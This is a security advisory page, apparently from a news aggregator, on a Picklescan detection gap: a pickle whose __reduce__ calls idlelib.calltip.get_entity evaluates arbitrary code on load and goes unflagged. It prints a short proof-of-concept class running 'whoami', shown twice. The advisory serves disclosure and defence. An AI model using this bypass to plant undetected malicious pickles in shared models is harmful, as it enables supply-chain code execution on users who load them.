Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-9xph-j2h6-g47v: Picklescan has a missing detection when calling built-in python library idlelib.calltip.get_entity

Summary

Using idlelib.calltip.get_entity function, which is a built-in python library function to execute remote pickle file.

Details

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to idlelib.calltip.get_entity function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn’t dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC

from idlelib.calltip import get_entity

class EvilCalltipGetEntity:
    def __reduce__(self):
        # get_entity(expression) -> eval(expression)
        return get_entity, ("__import__('os').system('whoami')",)

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT https://github.com/Qhaoduoyu

ghsa
#git#rce

Summary

Using idlelib.calltip.get_entity function, which is a built-in python library function to execute remote pickle file.

Details

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to idlelib.calltip.get_entity function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn’t dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC

from idlelib.calltip import get_entity

class EvilCalltipGetEntity:
    def __reduce__(self):
        # get_entity(expression) -> eval(expression)
        return get_entity, ("__import__('os').system('whoami')",)

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu

References

  • GHSA-9xph-j2h6-g47v
  • mmaitre314/picklescan@aecd11b

ghsa: Latest News

GHSA-224p-v68g-5g8f: GraphQL Armor Max-Depth Plugin Bypass via fragment caching